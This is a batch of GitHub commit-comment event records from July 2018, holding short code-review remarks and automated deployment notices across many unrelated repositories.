{"id":"7914907763","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586845,"position":42,"line":42,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:45:35Z","updated_at":"2018-07-03T20:45:35Z","author_association":"COLLABORATOR","body":"cast directly to string instead of using `as`."}},"created_at":"2018-07-03T20:45:35Z"}
{"id":"7914907993","type":"CommitCommentEvent","actor":{"login":"JJediny"},"repo":{"name":"usnistgov/OSCAL"},"payload":{"comment":{"id":29586846,"position":11,"line":12,"path":"docs/source/schema/index.html.md","commit_id":"0d86da743f0ed096cd079441c89ddaf000249275","created_at":"2018-07-03T20:45:38Z","updated_at":"2018-07-03T20:45:38Z","author_association":"COLLABORATOR","body":"still need to remove `JSON` at the end"}},"created_at":"2018-07-03T20:45:38Z"}
{"id":"7914912431","type":"CommitCommentEvent","actor":{"login":"michaeltu1"},"repo":{"name":"michaeltu1/Catan"},"payload":{"comment":{"id":29586856,"position":47,"line":47,"path":"catan/Game.py","commit_id":"ceccc06acbae2b23a6e8bde4ebd66907bd3380bf","created_at":"2018-07-03T20:46:43Z","updated_at":"2018-07-03T20:46:43Z","author_association":"OWNER","body":"replace \"!\" with \"not\"\r\nI don't think \"!\" is part of python syntax"}},"created_at":"2018-07-03T20:46:43Z"}
{"id":"7914912944","type":"CommitCommentEvent","actor":{"login":"michaeltu1"},"repo":{"name":"michaeltu1/Catan"},"payload":{"comment":{"id":29586860,"position":50,"line":50,"path":"catan/Game.py","commit_id":"ceccc06acbae2b23a6e8bde4ebd66907bd3380bf","created_at":"2018-07-03T20:46:50Z","updated_at":"2018-07-03T20:46:50Z","author_association":"OWNER","body":"replace \"!\" with \"not\"\r\nI don't think \"!\" is part of python syntax"}},"created_at":"2018-07-03T20:46:50Z"}
{"id":"7914915506","type":"CommitCommentEvent","actor":{"login":"cgerrior"},"repo":{"name":"cgerrior/recurly-example-backend-ruby"},"payload":{"comment":{"id":29586866,"position":7,"line":12,"path":"app.rb","commit_id":"11e34e281989aacfb51cda41c0efffbb5aef4c64","created_at":"2018-07-03T20:47:28Z","updated_at":"2018-07-03T20:47:28Z","author_association":"OWNER","body":"@jkwr why the change away from using ENV?"}},"created_at":"2018-07-03T20:47:28Z"}
{"id":"7914915733","type":"CommitCommentEvent","actor":{"login":"michaeltu1"},"repo":{"name":"michaeltu1/Catan"},"payload":{"comment":{"id":29586867,"position":96,"line":100,"path":"catan/Game.py","commit_id":"ceccc06acbae2b23a6e8bde4ebd66907bd3380bf","created_at":"2018-07-03T20:47:32Z","updated_at":"2018-07-03T20:47:32Z","author_association":"OWNER","body":"replace \"else if\" with \"elif\""}},"created_at":"2018-07-03T20:47:32Z"}
{"id":"7914916082","type":"CommitCommentEvent","actor":{"login":"michaeltu1"},"repo":{"name":"michaeltu1/Catan"},"payload":{"comment":{"id":29586868,"position":98,"line":102,"path":"catan/Game.py","commit_id":"ceccc06acbae2b23a6e8bde4ebd66907bd3380bf","created_at":"2018-07-03T20:47:37Z","updated_at":"2018-07-03T20:47:37Z","author_association":"OWNER","body":"replace \"else if\" with \"elif\""}},"created_at":"2018-07-03T20:47:37Z"}
{"id":"7914916819","type":"CommitCommentEvent","actor":{"login":"michaeltu1"},"repo":{"name":"michaeltu1/Catan"},"payload":{"comment":{"id":29586870,"position":102,"line":106,"path":"catan/Game.py","commit_id":"ceccc06acbae2b23a6e8bde4ebd66907bd3380bf","created_at":"2018-07-03T20:47:49Z","updated_at":"2018-07-03T20:47:49Z","author_association":"OWNER","body":"replace \"!\" with \"not\"\r\nI don't think \"!\" is part of python syntax"}},"created_at":"2018-07-03T20:47:49Z"}
{"id":"7914917070","type":"CommitCommentEvent","actor":{"login":"michaeltu1"},"repo":{"name":"michaeltu1/Catan"},"payload":{"comment":{"id":29586871,"position":105,"line":109,"path":"catan/Game.py","commit_id":"ceccc06acbae2b23a6e8bde4ebd66907bd3380bf","created_at":"2018-07-03T20:47:53Z","updated_at":"2018-07-03T20:47:53Z","author_association":"OWNER","body":"replace \"!\" with \"not\"\r\nI don't think \"!\" is part of python syntax"}},"created_at":"2018-07-03T20:47:53Z"}
{"id":"7914917368","type":"CommitCommentEvent","actor":{"login":"michaeltu1"},"repo":{"name":"michaeltu1/Catan"},"payload":{"comment":{"id":29586872,"position":108,"line":112,"path":"catan/Game.py","commit_id":"ceccc06acbae2b23a6e8bde4ebd66907bd3380bf","created_at":"2018-07-03T20:47:58Z","updated_at":"2018-07-03T20:47:58Z","author_association":"OWNER","body":"replace \"!\" with \"not\"\r\nI don't think \"!\" is part of python syntax"}},"created_at":"2018-07-03T20:47:58Z"}
{"id":"7914921744","type":"CommitCommentEvent","actor":{"login":"cgerrior"},"repo":{"name":"cgerrior/recurly-example-backend-ruby"},"payload":{"comment":{"id":29586885,"position":41,"line":34,"path":"app.rb","commit_id":"11e34e281989aacfb51cda41c0efffbb5aef4c64","created_at":"2018-07-03T20:49:05Z","updated_at":"2018-07-03T20:49:05Z","author_association":"OWNER","body":"@jkwr Let's just focus on a single subscription for now, i.e. let's remove the adjustments array."}},"created_at":"2018-07-03T20:49:05Z"}
{"id":"7914922574","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586887,"position":13,"line":13,"path":"Gravity/Gravity/Globals/SQLConstants.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:49:18Z","updated_at":"2018-07-03T20:49:18Z","author_association":"COLLABORATOR","body":"Column name should be grabbed by a join to `ArtifactViewField.ArtifactViewFIeldId` instead of a string substitution later."}},"created_at":"2018-07-03T20:49:18Z"}
{"id":"7914924518","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29586892,"position":null,"line":null,"path":null,"commit_id":"df2161aaebcfc9820f093ae99daa5ed09f2af875","created_at":"2018-07-03T20:49:50Z","updated_at":"2018-07-03T20:49:50Z","author_association":"MEMBER","body":"I was expecting a PR for this fix so we can talk about it first. Anyway, I just tested it, and it does not seem to fix #654. The scrollbar is still there. Usually `overflow-x: auto` means scrolling if content is too wide, so I doubt if will really fix the issue.\r\n\r\nI actually spent some time on this issue (because of the ticket https://rstudioide.zendesk.com/agent/tickets/28048), and my solution was:\r\n\r\n```css\r\n.sourceCode .col-md-12 {\r\n  padding: initial;\r\n}\r\n.sourceCode .row {\r\n  margin: initial;\r\n}\r\n```\r\n\r\nIt is probably not the most appropriate fix. I was wondering what you would come up with."}},"created_at":"2018-07-03T20:49:50Z"}
{"id":"7914926703","type":"CommitCommentEvent","actor":{"login":"cgerrior"},"repo":{"name":"cgerrior/recurly-example-backend-ruby"},"payload":{"comment":{"id":29586896,"position":5,"line":70,"path":"public/index.html","commit_id":"11e34e281989aacfb51cda41c0efffbb5aef4c64","created_at":"2018-07-03T20:50:25Z","updated_at":"2018-07-03T20:50:25Z","author_association":"OWNER","body":"@jkwr Let's keep this the way it was too."}},"created_at":"2018-07-03T20:50:25Z"}
{"id":"7914926870","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29586897,"position":null,"line":null,"path":null,"commit_id":"d6b40c935f10f5d10c235ed5bd30e581420be517","created_at":"2018-07-03T20:50:28Z","updated_at":"2018-07-03T20:50:28Z","author_association":"NONE","body":"Not sure if related but that commit doesn't seem to work, it's using \"rounds=656000\" by default"}},"created_at":"2018-07-03T20:50:28Z"}
{"id":"7914930101","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586905,"position":50,"line":50,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:51:19Z","updated_at":"2018-07-03T20:51:19Z","author_association":"COLLABORATOR","body":"Similar advice as above."}},"created_at":"2018-07-03T20:51:19Z"}
{"id":"7914933741","type":"CommitCommentEvent","actor":{"login":"adieuadieu"},"repo":{"name":"adieuadieu/alagarr"},"payload":{"comment":{"id":29586914,"position":null,"line":null,"path":null,"commit_id":"d992287240606a614821de8117fe051ab7b07340","created_at":"2018-07-03T20:52:20Z","updated_at":"2018-07-03T20:52:20Z","author_association":"OWNER","body":"Thanks @samstav for your support! 😊 "}},"created_at":"2018-07-03T20:52:20Z"}
{"id":"7914937679","type":"CommitCommentEvent","actor":{"login":"cgerrior"},"repo":{"name":"cgerrior/recurly-example-backend-ruby"},"payload":{"comment":{"id":29586929,"position":null,"line":null,"path":null,"commit_id":"11e34e281989aacfb51cda41c0efffbb5aef4c64","created_at":"2018-07-03T20:53:30Z","updated_at":"2018-07-03T20:53:30Z","author_association":"OWNER","body":"@jkwr I think I'll have you revert this commit, make a new branch, fix the few things I commented on, and then submit a pull request."}},"created_at":"2018-07-03T20:53:30Z"}
{"id":"7914945521","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29586949,"position":null,"line":null,"path":null,"commit_id":"54c0e6267b7243717690d1bca0b59ed62d0d0112","created_at":"2018-07-03T20:55:28Z","updated_at":"2018-07-03T20:55:28Z","author_association":"COLLABORATOR","body":"- moved <code>assert<code/> into foreach loop\r\n- chanded assertion clause from magic numbers to positive values (zero included)\r\n- <code>calcmannmonate<code/> still bugs out when testing 2600 limit, so <code>evaluateCalcMannMonate<code/> remains on <code>@Ignore<code/> for now"}},"created_at":"2018-07-03T20:55:28Z"}
{"id":"7914949004","type":"CommitCommentEvent","actor":{"login":"zilioti"},"repo":{"name":"clubedaentrega/api-lift"},"payload":{"comment":{"id":29586958,"position":20,"line":90,"path":"README.md","commit_id":"a62dbb087b177da49ee809e31de5367465f13835","created_at":"2018-07-03T20:56:15Z","updated_at":"2018-07-03T20:56:15Z","author_association":"MEMBER","body":"Is it not missing an `return` here for the default function?"}},"created_at":"2018-07-03T20:56:15Z"}
{"id":"7914949298","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29586959,"position":null,"line":null,"path":null,"commit_id":"e2f04f5113b65627ebbb6ee4f508185a52b829c9","created_at":"2018-07-03T20:56:19Z","updated_at":"2018-07-03T20:56:19Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-682](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-682).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-682-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T20:56:19Z"}
{"id":"7914952642","type":"CommitCommentEvent","actor":{"login":"KinRovtaz"},"repo":{"name":"KinRovtaz/vik"},"payload":{"comment":{"id":29586966,"position":null,"line":null,"path":null,"commit_id":"22b62bf24cc403781ccd48c2249aaa90c3fe570e","created_at":"2018-07-03T20:57:08Z","updated_at":"2018-07-03T20:57:08Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-03T20:57:08Z"}
{"id":"7914953392","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29586968,"position":null,"line":null,"path":null,"commit_id":"55ecf77d12258a89dc5ee2bc104eadab10b1e712","created_at":"2018-07-03T20:57:17Z","updated_at":"2018-07-03T20:57:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-sitee](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-sitee).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-sitee-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T20:57:17Z"}
{"id":"7914956664","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29586972,"position":1,"line":1,"path":"week-07/day-01/index.js","commit_id":"aabdc79898cb9c9de146a6c95a558b6b7a8a28f6","created_at":"2018-07-03T20:58:06Z","updated_at":"2018-07-03T20:58:06Z","author_association":"NONE","body":"Please use single quotes."}},"created_at":"2018-07-03T20:58:06Z"}
{"id":"7914959791","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29586981,"position":null,"line":null,"path":null,"commit_id":"925fd88b5c57ec55a31511e60ca527ca1efad39d","created_at":"2018-07-03T20:58:50Z","updated_at":"2018-07-03T20:58:50Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `nodes_count` |       +5 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -827 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4412)*\n"}},"created_at":"2018-07-03T20:58:50Z"}
{"id":"7914961323","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586983,"position":137,"line":137,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:59:12Z","updated_at":"2018-07-03T20:59:12Z","author_association":"COLLABORATOR","body":"We do this a lot. maybe wrap in a helper function?"}},"created_at":"2018-07-03T20:59:12Z"}
{"id":"7914964305","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29586988,"position":29,"line":29,"path":"week-07/day-01/index.js","commit_id":"aabdc79898cb9c9de146a6c95a558b6b7a8a28f6","created_at":"2018-07-03T20:59:53Z","updated_at":"2018-07-03T20:59:53Z","author_association":"NONE","body":"It's not necessary to check `=== undefined`, simply use `if (req.query.name && req.query.title)`"}},"created_at":"2018-07-03T20:59:53Z"}
{"id":"7914969625","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29587007,"position":31,"line":31,"path":"week-07/day-01/index.js","commit_id":"aabdc79898cb9c9de146a6c95a558b6b7a8a28f6","created_at":"2018-07-03T21:01:02Z","updated_at":"2018-07-03T21:01:02Z","author_association":"NONE","body":"Better if you create one variable, set it to the correct sentence and use  `res.json` once"}},"created_at":"2018-07-03T21:01:02Z"}
{"id":"7914971433","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29587011,"position":null,"line":null,"path":null,"commit_id":"54c0e6267b7243717690d1bca0b59ed62d0d0112","created_at":"2018-07-03T21:01:25Z","updated_at":"2018-07-03T21:01:25Z","author_association":"COLLABORATOR","body":"@rasple can you slap simon-frank for me and tell him to fix his code"}},"created_at":"2018-07-03T21:01:25Z"}
{"id":"7914972455","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/vue-tips"},"payload":{"comment":{"id":29587014,"position":null,"line":null,"path":null,"commit_id":"c6f99afc796a50772418ceb72e1f2908ce6db370","created_at":"2018-07-03T21:01:39Z","updated_at":"2018-07-03T21:01:39Z","author_association":"OWNER","body":"![fix_to_top](https://user-images.githubusercontent.com/13960169/42244366-beddae14-7ee2-11e8-9d5b-5d881cc26319.png)\r\n"}},"created_at":"2018-07-03T21:01:39Z"}
{"id":"7914977080","type":"CommitCommentEvent","actor":{"login":"Nkromin"},"repo":{"name":"Nkromin/refprog_1"},"payload":{"comment":{"id":29587030,"position":4,"line":15,"path":"README.md","commit_id":"ca9ff0fb68db8ce0ecfca76f0ac024696dc25a4c","created_at":"2018-07-03T21:02:45Z","updated_at":"2018-07-03T21:02:45Z","author_association":"OWNER","body":"The updated files requires this para\r\n"}},"created_at":"2018-07-03T21:02:45Z"}
{"id":"7914978052","type":"CommitCommentEvent","actor":{"login":"robjhyndman"},"repo":{"name":"carlanetto/M4comp2018"},"payload":{"comment":{"id":29587033,"position":4,"line":24,"path":"R/M4.R","commit_id":"157378e0d43c6fd20e6080f9e7f70020a533d5db","created_at":"2018-07-03T21:02:58Z","updated_at":"2018-07-03T21:02:58Z","author_association":"NONE","body":"I think this should be xx"}},"created_at":"2018-07-03T21:02:58Z"}
{"id":"7914980149","type":"CommitCommentEvent","actor":{"login":"Modsid"},"repo":{"name":"Modsid/xmrig-amd"},"payload":{"comment":{"id":29587038,"position":null,"line":null,"path":null,"commit_id":"250f7a85e2bce574b903fb88a04c681801cb1446","created_at":"2018-07-03T21:03:28Z","updated_at":"2018-07-03T21:03:28Z","author_association":"OWNER","body":"Added autorun function"}},"created_at":"2018-07-03T21:03:28Z"}
{"id":"7914984125","type":"CommitCommentEvent","actor":{"login":"cedriclmenard"},"repo":{"name":"opencv/opencv_3rdparty"},"payload":{"comment":{"id":29587046,"position":null,"line":null,"path":null,"commit_id":"8afa57abc8229d611c4937165d20e2a2d9fc5a12","created_at":"2018-07-03T21:04:23Z","updated_at":"2018-07-03T21:04:23Z","author_association":"NONE","body":"Unfortunately, there seems to be an error with this model. Using OpenCV Haar's cascade face detector, the landmarks always seem to be off or at a completely other place than what it should. I'm experiencing the same issue as: https://stackoverflow.com/questions/48080914/what-model-is-needed-to-detect-facemark-by-using-opencv-contrib"}},"created_at":"2018-07-03T21:04:23Z"}
{"id":"7914984777","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29587048,"position":51,"line":51,"path":"week-07/day-01/index.js","commit_id":"aabdc79898cb9c9de146a6c95a558b6b7a8a28f6","created_at":"2018-07-03T21:04:32Z","updated_at":"2018-07-03T21:04:32Z","author_association":"NONE","body":"It's unnecessary. `appendable` is always available here from `req.params`, because without `:appendable` is a different endpoint."}},"created_at":"2018-07-03T21:04:32Z"}
{"id":"7914993931","type":"CommitCommentEvent","actor":{"login":"LarryHudson322"},"repo":{"name":"LarryHudson322/ChrisR"},"payload":{"comment":{"id":29587076,"position":null,"line":null,"path":null,"commit_id":"e16d42dafd94429fb146f66cd2d3ab01b6da46fc","created_at":"2018-07-03T21:06:45Z","updated_at":"2018-07-03T21:06:45Z","author_association":"OWNER","body":"Changes accepted"}},"created_at":"2018-07-03T21:06:45Z"}
{"id":"7914996594","type":"CommitCommentEvent","actor":{"login":"agigleux"},"repo":{"name":"SonarSource/sonar-custom-rules-examples"},"payload":{"comment":{"id":29587084,"position":39,"line":88,"path":"java-custom-rules/pom.xml","commit_id":"98afcd602106234a74c55bd348856c22b870d227","created_at":"2018-07-03T21:07:24Z","updated_at":"2018-07-03T21:07:24Z","author_association":"MEMBER","body":"These 2 dependencies were transitive dependencies pulled because of java-frontend. So I had to add them to be able to compile."}},"created_at":"2018-07-03T21:07:24Z"}
{"id":"7914996852","type":"CommitCommentEvent","actor":{"login":"rich-iannone"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29587086,"position":null,"line":null,"path":null,"commit_id":"df2161aaebcfc9820f093ae99daa5ed09f2af875","created_at":"2018-07-03T21:07:27Z","updated_at":"2018-07-03T21:07:27Z","author_association":"MEMBER","body":"This fix does seem to work in the browser. When setting `Show scroll bars: Always`, I don't get any visible scroll bars in the code chunk. Here is a screenshot:\r\n\r\n<img width=\"1254\" alt=\"after_fix_code_chunk\" src=\"https://user-images.githubusercontent.com/5612024/42244451-f3130f12-7ec9-11e8-9ad9-41f55befd7d0.png\">\r\n\r\nI saved a screen shot that was before the fix (with the same setting) and this is what I saw:\r\n<img width=\"1059\" alt=\"before_fix_code_chunk\" src=\"https://user-images.githubusercontent.com/5612024/42244482-0ead901c-7eca-11e8-888d-f3fb0c5ac00b.png\">\r\n\r\nHowever, there is still an issue in the Preview version of the rendered document in RStudio, where the code chunk does seem to scroll. I wonder if your solution results in a fix to both versions of the render, so, I'll try it out.\r\n"}},"created_at":"2018-07-03T21:07:27Z"}
{"id":"7914998607","type":"CommitCommentEvent","actor":{"login":"dajuMasterDS"},"repo":{"name":"dajuMasterDS/TFM_Industrials_Pollutants"},"payload":{"comment":{"id":29587089,"position":null,"line":null,"path":null,"commit_id":"b8c6af674163f7f1cf4d2b870c5e4da15a3880cb","created_at":"2018-07-03T21:07:54Z","updated_at":"2018-07-03T21:07:54Z","author_association":"OWNER","body":"Temporal CSV folder"}},"created_at":"2018-07-03T21:07:54Z"}
{"id":"7914998774","type":"CommitCommentEvent","actor":{"login":"brwnj"},"repo":{"name":"pnnl/hundo"},"payload":{"comment":{"id":29587090,"position":null,"line":null,"path":null,"commit_id":"015642525f22288f76fd60bdc05eeb277fd0dbcf","created_at":"2018-07-03T21:07:57Z","updated_at":"2018-07-03T21:07:57Z","author_association":"CONTRIBUTOR","body":":grimacing:"}},"created_at":"2018-07-03T21:07:57Z"}
{"id":"7915000213","type":"CommitCommentEvent","actor":{"login":"samth"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":29587092,"position":null,"line":null,"path":null,"commit_id":"cda4e5befe2f31dd507e23c0b16990dc5a84f1f2","created_at":"2018-07-03T21:08:17Z","updated_at":"2018-07-03T21:08:17Z","author_association":"MEMBER","body":"This commit breaks the `libscrypt` package: https://plt.eecs.northwestern.edu/pkg-build/server/built/fail/libscrypt.txt"}},"created_at":"2018-07-03T21:08:17Z"}
{"id":"7915003458","type":"CommitCommentEvent","actor":{"login":"peff"},"repo":{"name":"cmcaine/tridactyl"},"payload":{"comment":{"id":29587102,"position":6,"line":2095,"path":"src/excmds.ts","commit_id":"e20a224fb8d8bbb2b742599cc69672d7c9fe0c42","created_at":"2018-07-03T21:09:05Z","updated_at":"2018-07-03T21:09:05Z","author_association":"CONTRIBUTOR","body":"Shouldn't this be `urls[0]` instead of `content` (and below, as well)?"}},"created_at":"2018-07-03T21:09:05Z"}
{"id":"7915004705","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29587105,"position":28,"line":28,"path":"week-07/day-02/exercises/giphy/main.js","commit_id":"065b93fa212ef274dea24bd9ebdad21cf84e85a9","created_at":"2018-07-03T21:09:21Z","updated_at":"2018-07-03T21:09:21Z","author_association":"NONE","body":"🆗 "}},"created_at":"2018-07-03T21:09:21Z"}
{"id":"7915009489","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29587122,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-03T21:10:32Z","updated_at":"2018-07-03T21:10:32Z","author_association":"NONE","body":"I haven't filed a bug yet, I sent an email to folks that own this.\r\n\r\nThe downside of the workaround is that you still end up downloading a ton of packages you don't need.  Since you don't actually use the package and it doesn't leak to other projects it's probably harmless but if it were me I would be trying to get rid of those RID-specific restores to get back some perf.\r\n\r\nHere's a couple other workarounds:\r\n1. Set a bogus RID like `none`.  This will still do the restore but won't bring down packages you don't need.\r\n2. Set the RID list to `;`, this will satisfy the MSBuild check so that it won't get overwritten with the hardcoded value, but then be filtered by NuGet during restore:\r\n```xml\r\n<RuntimeIdentifiers Condition=\"'$(TargetFramework)' == 'portable-net45+win8+wpa81'\">;</RuntimeIdentifiers>\r\n```\r\nIf this were my project I'd probably go with option 2."}},"created_at":"2018-07-03T21:10:32Z"}
{"id":"7915009984","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29587125,"position":22,"line":22,"path":"week-07/day-03/exercises/bookstore-endpoints/server.js","commit_id":"6b9107b75bfc0a2594c05ccc952a575b513e4ff3","created_at":"2018-07-03T21:10:39Z","updated_at":"2018-07-03T21:10:39Z","author_association":"NONE","body":"It's not a good idea to use underscore in endpoints."}},"created_at":"2018-07-03T21:10:39Z"}
{"id":"7915015628","type":"CommitCommentEvent","actor":{"login":"Sivaraman-R"},"repo":{"name":"Sivaraman-R/DemoVSTS"},"payload":{"comment":{"id":29587138,"position":null,"line":null,"path":null,"commit_id":"79a420cdbaca2edbca0e0b4c778fcfedd68966a4","created_at":"2018-07-03T21:12:05Z","updated_at":"2018-07-03T21:12:05Z","author_association":"OWNER","body":"Approved"}},"created_at":"2018-07-03T21:12:05Z"}
{"id":"7915016663","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29587142,"position":null,"line":null,"path":null,"commit_id":"35388d0f65c87d5688739e33f2c59b31db3e71bb","created_at":"2018-07-03T21:12:19Z","updated_at":"2018-07-03T21:12:19Z","author_association":"COLLABORATOR","body":"changed test to be based of the interface rather than the implementation\r\nalso removed <code>@evaluateToString</code> because it was completely pointless and not part of the interface"}},"created_at":"2018-07-03T21:12:19Z"}
{"id":"7915018423","type":"CommitCommentEvent","actor":{"login":"schildbach"},"repo":{"name":"bitcoinj/bitcoinj"},"payload":{"comment":{"id":29587148,"position":null,"line":null,"path":null,"commit_id":"89fb8c3bfadd67c99271db0b94b6b48da5e8454c","created_at":"2018-07-03T21:12:43Z","updated_at":"2018-07-03T21:12:43Z","author_association":"MEMBER","body":"Can you please ask questions on the mailing list? If you comment here, chances are nobody will read it."}},"created_at":"2018-07-03T21:12:43Z"}
{"id":"7915018576","type":"CommitCommentEvent","actor":{"login":"bb010g"},"repo":{"name":"bb010g/betterdiscordctl"},"payload":{"comment":{"id":29587149,"position":32,"line":277,"path":"betterdiscordctl","commit_id":"d12d97df584098d00d5167291f10f255f9444bf9","created_at":"2018-07-03T21:12:45Z","updated_at":"2018-07-03T21:12:45Z","author_association":"OWNER","body":"The issue with this is that it doesn't deal properly with filenames that contain newlines, which are legal. See http://mywiki.wooledge.org/BashFAQ/020 for more info."}},"created_at":"2018-07-03T21:12:45Z"}
{"id":"7915023607","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29587155,"position":null,"line":null,"path":null,"commit_id":"88455b93deeee133149525271950e20bdfbbf425","created_at":"2018-07-03T21:13:59Z","updated_at":"2018-07-03T21:13:59Z","author_association":"OWNER","body":"@DU-jdto \r\nThe reason why I think this is a bug...is because one can't simply update alpha midway through a search.\r\n\r\nEven though we are in qSearch...we may still traverse the tree with a series of captures.\r\nIn the master you may get an eval of 150 at depth = -1, but the search may continue to depth=-5 where the  eval shows 0.\r\n\r\n0 is the true score that alpha should update not 150.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-03T21:13:59Z"}
{"id":"7915025403","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29587160,"position":null,"line":null,"path":null,"commit_id":"b853a28681eb0c34a9df62fdb7687e89df54d3dd","created_at":"2018-07-03T21:14:25Z","updated_at":"2018-07-03T21:14:25Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T21:14:25Z"}
{"id":"7915025434","type":"CommitCommentEvent","actor":{"login":"mrvivacious"},"repo":{"name":"mrvivacious/LikeFree"},"payload":{"comment":{"id":29587161,"position":null,"line":null,"path":null,"commit_id":"acb30363e89a242451da40e0aa6ba14c40cc2ee5","created_at":"2018-07-03T21:14:26Z","updated_at":"2018-07-03T21:14:26Z","author_association":"OWNER","body":"wrong commit name lol"}},"created_at":"2018-07-03T21:14:26Z"}
{"id":"7915025579","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29587162,"position":null,"line":null,"path":null,"commit_id":"df2161aaebcfc9820f093ae99daa5ed09f2af875","created_at":"2018-07-03T21:14:28Z","updated_at":"2018-07-03T21:14:28Z","author_association":"MEMBER","body":"Interesting... I see the scrollbar in both RStudio and Chrome (as well as Firefox/Safari)."}},"created_at":"2018-07-03T21:14:28Z"}
{"id":"7915025817","type":"CommitCommentEvent","actor":{"login":"atiq275217"},"repo":{"name":"atiq275217/wave-solution"},"payload":{"comment":{"id":29587163,"position":null,"line":null,"path":null,"commit_id":"73a159a4a5df5f7d59c02a9ca3882af1452c463a","created_at":"2018-07-03T21:14:31Z","updated_at":"2018-07-03T21:14:31Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-03T21:14:31Z"}
{"id":"7915026501","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29587164,"position":33,"line":109,"path":"week-07/reddit-proj/server.js","commit_id":"799cdc43b9a59e059dedb850f098a50b24890366","created_at":"2018-07-03T21:14:41Z","updated_at":"2018-07-03T21:14:41Z","author_association":"NONE","body":"Please use the `?` version instead of template literals."}},"created_at":"2018-07-03T21:14:41Z"}
